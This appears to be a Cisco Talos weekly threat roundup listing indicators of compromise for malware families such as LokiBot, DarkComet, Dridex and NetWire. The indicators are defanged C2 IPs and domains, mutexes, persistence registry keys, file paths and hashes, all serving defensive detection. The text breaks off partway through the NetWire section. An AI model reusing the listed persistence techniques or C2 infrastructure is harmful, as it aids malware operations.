Today, Talos is publishing a glimpse into the most prevalent threats we've observed between April 23 and April 30. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat NameTypeDescription
Win.Packed.LokiBot-9853576-0 Packed Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents delivered via spam emails.
Win.Malware.Razy-9855433-0 Malware Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypt the data, and send it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence.
Win.Dropper.DarkComet-9853582-1 Dropper DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.
Win.Packed.Dridex-9853590-1 Packed Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Malware.CopperStealer-9853616-1 Malware CopperStealer is malware that typically spreads via cracked file downloads and attempts to steal credentials and session cookies from installed web browsers.
Win.Dropper.NetWire-9853730-0 Dropper NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Remcos-9855176-0 Dropper Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Packed.njRAT-9854103-1 Packed njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014.
Win.Packed.ZeroAccess-9854205-1 Packed ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click fraud campaigns.

Threat Breakdown

Win.Packed.LokiBot-9853576-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
MutexesOccurrences
3749282D282E1E80C56CAE5A 4
9DAA44F7C7955D46445DC99B 4
rZbnabpXxgObkzcenAGtuiaXOgf 1
wzaowyXpGLWUa 1
NnRTijRelUgAUagsEt 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
172[.]67[.]188[.]154 3
162[.]88[.]193[.]70 2
104[.]21[.]19[.]200 2
193[.]233[.]75[.]49 2
216[.]146[.]43[.]70 1
131[.]186[.]113[.]70 1
35[.]247[.]234[.]230 1
185[.]209[.]1[.]112 1
104[.]168[.]140[.]79 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
checkip[.]dyndns[.]com 3
checkip[.]dyndns[.]org 3
freegeoip[.]app 3
gccorps[.]com 1
issth[.]com 1
amrp[.]tw 1
Files and or directories createdOccurrences
%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\<exe name>.log 16
%System32%\Tasks\Updates 7
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 7
%APPDATA%\D282E1 4
%APPDATA%\D282E1\1E80C5.lck 4
%APPDATA%\7C7955\5D4644.lck 4
%APPDATA%\.exe 2
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\.url 2
%APPDATA%\ipkjBIJaVvWZ.exe 1
%APPDATA%\EvKldzxyPYTK.exe 1
%APPDATA%\assVVwyaGZOmx.exe 1
%APPDATA%\BsDanabug.exe 1
%System32%\Tasks\Updates\BsDanabug 1
%System32%\Tasks\Updates\assVVwyaGZOmx 1
%System32%\Tasks\Updates\ipkjBIJaVvWZ 1
%APPDATA%\BxQVnnbwVJ.exe 1
%APPDATA%\IXLTwKJY.exe 1
%System32%\Tasks\Updates\IXLTwKJY 1
%System32%\Tasks\Updates\EvKldzxyPYTK 1
%System32%\Tasks\Updates\BxQVnnbwVJ 1
%APPDATA%\waVSRZEHg.exe 1
%System32%\Tasks\Updates\waVSRZEHg 1

File Hashes

1f36b91cb509815bd462aed405d2afbe26cded0fc48b34c9536e6145e51ff44c
21a0d8a38791dc934816131f547c4c9d2477c8b39fc9fca59443d1403496ff29
4d339e79af78abd3df7782c0e7e1c918673b472a45828a0f0cf8e9fd70232be0
4d5efc07157713342c2b04e645ad4df03a689c09f92c928024518ebffa883bfd
5ebab78acdc4ae7a65957c7063152b44729b6e0e74548fc30a0ba1244a2ec0eb
756cc5cb41efb5e4e46f92db955bc7df21a9934b54b763d2b1c8ad86b26c6599
ab6d31139c54fc13b27e3d6ce2487aa78bf333490d465909a4db8a226bf5c0ac
b1fafcdfd18cc67cd56d5cafc2bb1372e4be9a54b52285c52167c8a4bcf975fb
c0295ca9ce89cabe23391eb8c37dea6275da16c06f8529a1f0bccf649689ac63
c07e6b5b8104d46b245746b6cec53d857d7e9cd6f1ce792a15b24d07a000ec7f
c6454a5d2a8342b802f868b2d50d0f450e344ebe5f7cba06b7229db0be448211
d73ed97000a97e1ce4ffe9813762b964115725460892b61961ebc1b882cb62a1
e9675439c56914ef8ee45a48af8bf6826c306e25b2e0d8c5901ebbfd0e6d374a
efd9f0190abb0ef640781591f117bbc5056e1d88cdb453634b8df0eada24badd
f96991d62a83df7d8ae7bc8fa779d6145d04b01b2e64454522b21bf6d65609be
fe7479e0f85f368fe788c73b89e703e9b3d1885df1b304f8d7b2fcfe14a067a0

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.Razy-9855433-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 29 samples
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
104[.]21[.]38[.]216 17
104[.]23[.]98[.]190 15
172[.]64[.]101[.]8 15
104[.]23[.]99[.]190 13
172[.]64[.]100[.]8 13
172[.]67[.]139[.]81 11
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
pastebin[.]com 28
q[.]gs 28
aporasal[.]net 28
Files and or directories createdOccurrences
%System32%\Tasks\iuqcNinke7c5 28
<malware cwd>\old_<malware exe name> (copy) 6
\TEMP\9CqAB.xml 1
\TEMP\GseMbDFK.xml 1
\TEMP\HhDkUNSu.xml 1
\TEMP\6kcQKmwE.xml 1
\TEMP\6628794ad55c12000753c70fa6a69d76.exe 1
\TEMP\uzXTmkn.xml 1
\TEMP\sGC59QCZS.xml 1
\TEMP\jpptbs6K.xml 1
\TEMP\tipLr8YLi.xml 1
\TEMP\RdPh15.xml 1
\TEMP\8OYCaQaX.xml 1
\TEMP\xpT6j.xml 1
\TEMP\aKA1pf.xml 1
\TEMP\Hwllblz.xml 1
\TEMP\5wMFmB.xml 1
\TEMP\GnqLf85.xml 1
\TEMP\TyNzwmv.xml 1
\TEMP\JZ8hCl1qL.xml 1
\TEMP\h8bLuEvoT.xml 1
\TEMP\MsC5uav.xml 1
\TEMP\EGmw9.xml 1
\TEMP\0j0eqW97p.xml 1
\TEMP\x49QP.xml 1

*See JSON for more IOCs

File Hashes

0049aa4a443b45891e82a3651a37d59f415ee05c96b6b4d1c0fa6b9d9eedd14e
020b87c939ac881f5af3704245908b75f1e96a42964488ec78318b3532c738e9
03a93a62f1938d8bee2ddbf0a5ff675359f57eae83a1b10dfc1f47b5a491b85c
045ab0c59884b754d8ba4e58989253489ba5904c0f38c66e292a9f632288bf29
0764c56efff54914a14a2881ade1c0a74cbc43578b9bd487ba95ef7d5626badd
09fcb19e5000fdfbefaa7bd7bbed538b7c5b31745b1de2b3154e8d9385022fc9
0b4e82aab7686f0a8dad1e7a390b28951f5f2a3dcd150806dfb5d51379c70179
0beb0ac7c11d59717fb58058ea09f31a29e2b3b4f194006db9ab22910660f22e
0fea789e71c7c7a585ba3354bd58c48ee10fd12df5b20af977c7a22304f8cd00
13602e54f84ce0d05687adfbe86a48083766ee558bcb6fe2ceaf672023881aea
1a9b10fcde007063242cabadde9dd8938f6d614ad2a128e0c474e933cf8f30f1
1c190b70cbf94025024d12ba5091ebd580a21ecb52ea687d5540a64db57ad93f
1ee7cfe6dcd880c312e6ada8c0cd29751a096cf5a9bd59006c77d09c8273eda2
225acc1112fda1c8c83cd89e1d66246269797fddd534890a2522c016155f3300
22b551eea5b5609ec2201d46932ebdaa68191d514e60a5359a4f2b3d237b6f23
2392b3bea0e4669509b4422ea0c30faeaf29fb216bc89c446f9cb321c3ec8b1d
2595d9660e99e4d2a21c9e8b1ce7d1025be45df6633d3e5ae2a4b6579dfa5727
264e1d914c7979052662f9aa38cd66d9d8124ca003ea395eb3dac4fdf40a8070
2766f945c6cb716e4e02b984b9739d8d6eed3feff528dc01d400159970d7d4ea
2793581d25d91f1867c6e5892b7db6aba80827e6bd182a6e92fa12799481fe41
2a86c3ba0598085127537a469e23bd02e4e04d5c4b7b411003c5a51995a823dc
2b52fb4c6a6d47d4bb7b592c327ba3e86ff9153c3bb516556f425005c0b244d3
2b9f5e9b850e8f262e67e4f4cf6b3033d2c7e28475015f8d9cb0bdea1d4b35d0
2cb1889455de65a6fdac24fadcc723e6d77481bf3978039cc79fd18026caac05
2d7826b9b965c6f1cc01fdf512a4b3345d7c862a20f2b8ad131356bb921ebda4

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Dropper.DarkComet-9853582-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 27 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\DC3_FEXEC 23
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: UserInit
20
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MicroUpdate
12
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: DarkComet RAT
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: csrss
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN
Value Name: NoControlPanel
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableRegistryTools
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: windows
1
MutexesOccurrences
DC_MUTEX-<random, matching [A-Z0-9]{7}> 15
DCPERSFWBP 5
DCMIN_MUTEX-TDNJD9M 5
DCMIN_MUTEX-TWA8QTT 2
DCMIN_MUTEX-Q1AM59Z 1
Global\167abac1-a33b-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
78[.]159[.]135[.]230 1
3[.]223[.]115[.]185 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
alioo[.]no-ip[.]biz 3
hdredirect-lb7-5a03e1c2772e1c9c[.]elb[.]us-east-1[.]amazonaws[.]com 1
iamback010[.]no-ip[.]biz 1
khaledreal[.]zapto[.]org 1
jack-point[.]ddns01[.]com 1
realworld[.]no-ip[.]org 1
jack-point[.]ddns[.]net 1
dr[.]no-ip[.]biz 1
Files and or directories createdOccurrences
%APPDATA%\dclogs 22
%HOMEPATH%\Documents\MSDCSC 7
%HOMEPATH%\Documents\MSDCSC\msdcsc.exe 7
%HOMEPATH%\Documents\DCSCMIN 7
%HOMEPATH%\Documents\DCSCMIN\IMDCSC.exe 7
%ProgramData%\Microsoft\Windows\Start Menu\MSDCSC 4
%ProgramData%\Microsoft\Windows\Start Menu\MSDCSC\msdcsc.exe 4
%System32%\drivers\etc\hosts 1
%APPDATA%\MSDCSC 1
%APPDATA%\MSDCSC\msdcsc.exe 1
%SystemRoot%\SysWOW64\DCSCMIN 1
%SystemRoot%\SysWOW64\DCSCMIN\IMDCSC.exe 1
%System32%\DCSCMIN\IMDCSC.exe 1

File Hashes

010bf3099bc2403d6f3960d2954b82bf069a81fc5e4953cf64bed71d217f242a
07a96a4390f16d1fc1968e9eee6be89e1bba18f422c152ae7e6721a505270d8a
10d52c9b3bb30ba161bd9eb29f330f148c0a9d88c85164eff966a79007e82c1f
11913fc1c492338ea3e4ebaa6759db7c9cab0e0e891c8562076c50fea573b6cc
21781a6f310ae1f7b84080f46b4a172134f56a0ca2518b40bdfa95bef314d8e4
3d10c8f0c8b9fe07573fad0cc947773cb86e1b1aa53e27a2c86ed2e378f40f65
415bc8faba4836cb6d63e3839a18de12a61a1f760d1525f3dd95928b98575a22
42e06ac0b833f62300866b7336605d79b59f50eeeb6011ea81666bba7d371ec7
4e9fef80a86e3886520febb37ba25cabaec916ba36fa5e4170ef1e4ccf1ca088
570f73161c4068638bf73c9bb5defb380abaafa13d02da6b52413c5f2394407a
751b8587841eece8d5a252d0182db33870bd86e0c3192ad5fd84ad1b8da5491e
79dbec223bc891d5cd9c23c32362f9aaa4173462ea1aeae52771dad94de28b8f
836003b9a373eab9dd68122cbf7f4452335e93de21c83b9343194724f35d4082
86aab538bbc31f0eb1da42b5790ee161588ca055eeda4c4427d708a3257422f3
8824a45e88f306509c27ee8fc7faa5c37b53f9590585106941d40f6339304401
8aeba3f1a2717206b0bf646e9b6e1e141b1d49a9be8dcd9c8aa280f5e1d4f2ea
9432ef1d529df07e69c9e1135330d39d526fd69683c024267365e16f2d6dac57
9e3fb96c5fa4c15e89eb88a3883a5b8af9f6ee7984511d2aceb6fc5aa92914c2
a29c5b1f747b858227677ff509c5e0e33c436fb860891bf35657e216fb64b6e4
a477ed7f4ceb10cb5e7dcfd96967721bde088a78e0d160c148444292b941b7b3
c413d2c9a75f71b79f104f5888ac4d3ad58b72f0b13919f359d394184192d893
c8a54e74c83b36262a6a212d4c066c35b91e5b9e953a6732d2eae30db8b0e159
ce494e41285d7985a1adf5964434b80c8901243c6d31b07571600fb3a334855a
ed692aacdfb6899a24d163a18f2cefea82b5f562d237b3023d8b005b591b8c03
ef657368376fda05a0be80175f2916032fe025ab5798f5341295299088e488de

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Dridex-9853590-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: trkcore
12
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
Value Name: CheckSetting
12
MutexesOccurrences
<random, matching [A-Z0-9]{10}> 12
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
172[.]217[.]6[.]206 12
104[.]23[.]99[.]190 8
104[.]23[.]98[.]190 4
173[.]194[.]175[.]113 3
173[.]194[.]175[.]100/31 3
173[.]194[.]175[.]138/31 3
205[.]185[.]216[.]42 2
173[.]194[.]175[.]102 2
23[.]3[.]13[.]160 2
72[.]21[.]81[.]240 1
23[.]3[.]13[.]88 1
23[.]3[.]13[.]153 1
23[.]3[.]13[.]155 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
pastebin[.]com 12
w[.]google[.]com 12
www3[.]l[.]google[.]com 11
cds[.]d2s7q6s2[.]hwcdn[.]net 2
www[.]p6zkflkcvi[.]com 1
www[.]lutzv5kbv7[.]com 1
www[.]hpcopclesw[.]com 1
www[.]7nco416xfq[.]com 1
www[.]re7zlg8f4v[.]com 1
www[.]ox7jojjedp[.]com 1
www[.]kcx9t5lh2a[.]com 1
www[.]m2nlbyfhax[.]com 1
www[.]yhqc0c11ri[.]com 1
www[.]rnqrihkgzw[.]com 1
www[.]t9ebjn8jqh[.]com 1
www[.]1qoty6oaol[.]com 1
www[.]miatxpca3u[.]com 1
www[.]sobofskydd[.]com 1
www[.]x2pgp5wjr0[.]com 1
www[.]fp2h4lxn8h[.]com 1
www[.]6a9zdmescj[.]com 1
www[.]duualbwpuh[.]com 1
www[.]tbaxjyizbw[.]com 1
www[.]smm8b80u3p[.]com 1
www[.]flkxkpm8v1[.]com 1

*See JSON for more IOCs

Files and or directories createdOccurrences
<malware cwd>\old_<malware exe name> (copy) 11

File Hashes

218cc8ff17bbd26c5c31934505323b8534c58c135aa8a8692c44ec7fc0be15c6
75696517151d860987dfb21198fe3812227925d966f0ba55f75de288cf2d6188
7a3e97d7aa140d10002eb68f99dab1bad1565793612f29d1ee26bb6bb707e37a
7d63ea5e24688170bcb8a8e4ead2bf44630f535f6fab4367b6a2187efbdda76f
9410ddd1c40b758b36292887aad763d89146362a56408133942dfbc2d4794e7a
a9b47e3f8e662a33c138f82ea6e70cef9df26199360826cf25ecd1b8018c9fa1
b12e85f0eb340193b01a2457c74378e8ce6cc16b9b53f8207ec626d288ba7a0c
bc2a02a08ed58881c00e5353b50f8c60487e9b7255a2406d79b085f4112ca89b
be37f7c829f7cec24d24b8dfb7da38acf1a30b5fe27ff68e66d474a488ba3890
eb7a225b006f2909094d10ed0045c0d9eea0ad9d4c32b7d92c1137542b4e1c30
f1c6c4a88dcaa3ff720664426012da5b75df06c030c7459d37f4558758d1278a
f7fd7d2e49b27b4aede0d1fd8a61e0c7c9334dc959fb26c8ed2fcb940cd31dcb

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.CopperStealer-9853616-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\MICROSOFT\A0B923820DCC509A 16
<HKLM>\SOFTWARE\MICROSOFT\9D4C2F636F067F89 16
<HKLM>\SOFTWARE\MICROSOFT\6BF27B46191C0E02 16
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\6C0CE2DD0584C47CAC18839F14055F19FA270CDD
Value Name: Blob
16
MutexesOccurrences
Global\exist_sign_task_Hello001 16
Global\exist_sign_task_Hello002 16
Global\exist_sign__install_r3 16
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
75c104b52c9869a5[.]xyz 15
f059009a45a12d8a[.]xyz 1
Files and or directories createdOccurrences
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\extensions.json 16
%LOCALAPPDATA%\crx.json 16
%TEMP%\download 16
%TEMP%\download\MiniThunderPlatform.exe 16
%TEMP%\download\ThunderFW.exe 16
%TEMP%\download\atl71.dll 16
%TEMP%\download\dl_peer_id.dll 16
%TEMP%\download\download_engine.dll 16
%TEMP%\download\msvcp71.dll 16
%TEMP%\download\msvcr71.dll 16
%TEMP%\download\zlib1.dll 16
%TEMP%\xldl.dat 16
%TEMP%\xldl.dll 16
%APPDATA%\Microsoft\Windows\4b5ce2fe28308fd9 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\storage 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\storage\default 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\storage\default\moz-extension+++68c56b1f-25b6-4a97-b66d-eb454bcdbf0f^userContextId=4294967295 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\storage\default\moz-extension+++68c56b1f-25b6-4a97-b66d-eb454bcdbf0f^userContextId=4294967295\.metadata-v2 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\storage\default\moz-extension+++68c56b1f-25b6-4a97-b66d-eb454bcdbf0f^userContextId=4294967295\idb 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\storage\default\moz-extension+++68c56b1f-25b6-4a97-b66d-eb454bcdbf0f^userContextId=4294967295\idb\3647222921wleabcEoxlt-eengsairo.files 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\storage\default\moz-extension+++68c56b1f-25b6-4a97-b66d-eb454bcdbf0f^userContextId=4294967295\idb\3647222921wleabcEoxlt-eengsairo.sqlite 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\storage\default\moz-extension+++c9cdd9b2-a8a6-4f4c-8167-86f19e1820e6^userContextId=4294967295 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\storage\default\moz-extension+++c9cdd9b2-a8a6-4f4c-8167-86f19e1820e6^userContextId=4294967295\.metadata-v2 16
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\storage\default\moz-extension+++c9cdd9b2-a8a6-4f4c-8167-86f19e1820e6^userContextId=4294967295\idb 16

*See JSON for more IOCs

File Hashes

050270099094053dba024ea7f1104291f152c973321956289a669249bfba784f
0c7e07bcbd13ee8833fd1611ceb55f902cdf5b367835088307f6b7005fc930a8
2a825f67586f66e2a95668a37f244005d60f61fba39154783055a84793f3efcb
36cf00fcbf84230afc22e6374cf5c87c5589540a5201686bc0e3363825098cd5
4103afedb671c14e034e2e96062434699af0c292fc6eb283afe283a47b8eb0b2
54a33e98ff5f1711c6036ead3e2a3c7b11564bdc3069f7a3974073507c299c6d
69b389fea9ab9937b12e41fe2da60d633e41752396b35d2467815237bd5968a9
77c51d8d1558a8f1f890f8f26ebd2f1ae0f6a7bfb9a16c9f88a4f062502e12e3
7ba6372569f35ad88cfe2299aa4d0250c38137febb2fb54c2079f3464b06ee24
7c1a3567de46abe9d58ef68e9cd5ab3398509f5be091165885a47e09ebf27108
7cc72fcc65b87485b6459f779999e82fdb95bb1547749a9967f915d412851e9b
9fc5716a2e20f4525be7ae1d284272223bb9cd617799f9ac2bda46bb15f25b52
a1ae34dd586c3e0b8cc71c21fce1375d54e6ba8064294241677610d41f8357b6
a92c46c26757d931da99f22cc92497a20be7f6779b21266165753b27d46f63f4
b5dae1183c4c3af41d15a472795dc2af1f0d515c99771b334bed4d966444eb2b
b987a13d560d0185a4739e79734f496b81ab56a35eb27d4e8643da79d88cf578

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Dropper.NetWire-9853730-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\NETWIRE 1
<HKCU>\SOFTWARE\NETWIRE
Value Name: HostId
1
<HKCU>\SOFTWARE\MICROSOFTWNDDDOWS98-739KD5 1
<HKCU>\SOFTWARE\MICROSOFTWNDDDOWS98-739KD5
Value Name: licence
1
<HKCU>\SOFTWARE\STORE-CZWI6V 1
<HKCU>\SOFTWARE\STORE-CZWI6V
Value Name: licence
1
<HKCU>\SOFTWARE\MICROSOFTWNDDDOWS98-739KD5
Value Name: exepath
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Bpmui
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Gtxzx
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\5AW83665KL 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Imvkm
1
<HKCU>\SOFTWARE\STORE-CZWI6V
Value Name: exepath
1
<HKCU>\SOFTWARE\NETWIRE
Value Name: Install Date
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Dljiq
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Sewfk
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Yklwx
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Xcrio
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Zfmlr
1
MutexesOccurrences
Global\<random guid> 7
3749282D282E1E80C56CAE5A 2
Remcos_Mutex_Inj 2
9DAA44F7C7955D46445DC99B 2
- 1
microsoftwndddows98-739KD5 1
store-CZWI6V 1
a0ca6e8ac2f9de4d1d0ed1213f166cbc 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
162[.]159[.]134[.]233 7
162[.]159[.]135[.]233 5
162[.]159[.]130[.]233 3
162[.]159[.]129[.]233 3
162[.]214[.]156[.]4 2
162[.]159[.]133[.]233 1
89[.]249[.]74[.]213 1
37[.]139[.]64[.]106 1
172[.]67[.]217[.]241 1
104[.]21[.]70[.]22 1
194[.]32[.]146[.]143 1
172[.]67[.]214[.]105 1
103[.]150[.]8[.]54 1
142[.]44[.]252[.]19 1
185[.]236[.]203[.]123 1
94[.]103[.]80[.]254 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
cdn[.]discordapp[.]com 11
harmonyidtech[.]com 2
style[.]ptbagasps[.]co[.]id 1
xchilogs[.]duckdns[.]org 1
salonirang[.]duckdns[.]org 1
taker2[.]xyz 1
greenbazaar[.]xyz 1
dataprotectcdn[.]datarecognitionpath[.]xyz 1
Files and or directories createdOccurrences
%PUBLIC%\Libraries\temp 16
%APPDATA%\D282E1 2
%APPDATA%\D282E1\1E80C5.lck 2
%APPDATA%\7C7955\5D4644.lck 2
%APPDATA%\7C7955\5D4644.exe (copy) 2
%ProgramFiles%\Microsoft DN1 1
%LOCALAPPDATA%\Microsoft Vision 1
%APPDATA%\microsoftwndddows98\logs.dat 1
%APPDATA%\microsoftwndddows98 1
%APPDATA%\store 1
%APPDATA%\store\olok.ocx 1
%PUBLIC%\Libraries\Imvkm (copy) 1
%PUBLIC%\Libraries\Imvkmpoe.exe 1
%PUBLIC%\Libraries\mkvmI.url 1
%PUBLIC%\Libraries\Xcrio (copy) 1
%PUBLIC%\Libraries\Xcriopoe.exe 1
%PUBLIC%\Libraries\oircX.url 1
%PUBLIC%\Libraries\Zfmlr (copy) 1
%PUBLIC%\Libraries\Zfmlrpoe.exe 1
%PUBLIC%\Libraries\rlmfZ.url 1
%PUBLIC%\Libraries\Dljiq (copy) 1
%PUBLIC%\Libraries\Dljiqpoe.exe 1
%PUBLIC%\Libraries\qijlD.url 1
%PUBLIC%\Libraries\Bpmuipoe.exe 1
%PUBLIC%\Libraries\iumpB.url 1

*See JSON for more IOCs

File Hashes

00bda25cb0c937ac4df0b331a2b5dc97716aa6e543f4fa2669ca9e1e80e3be72
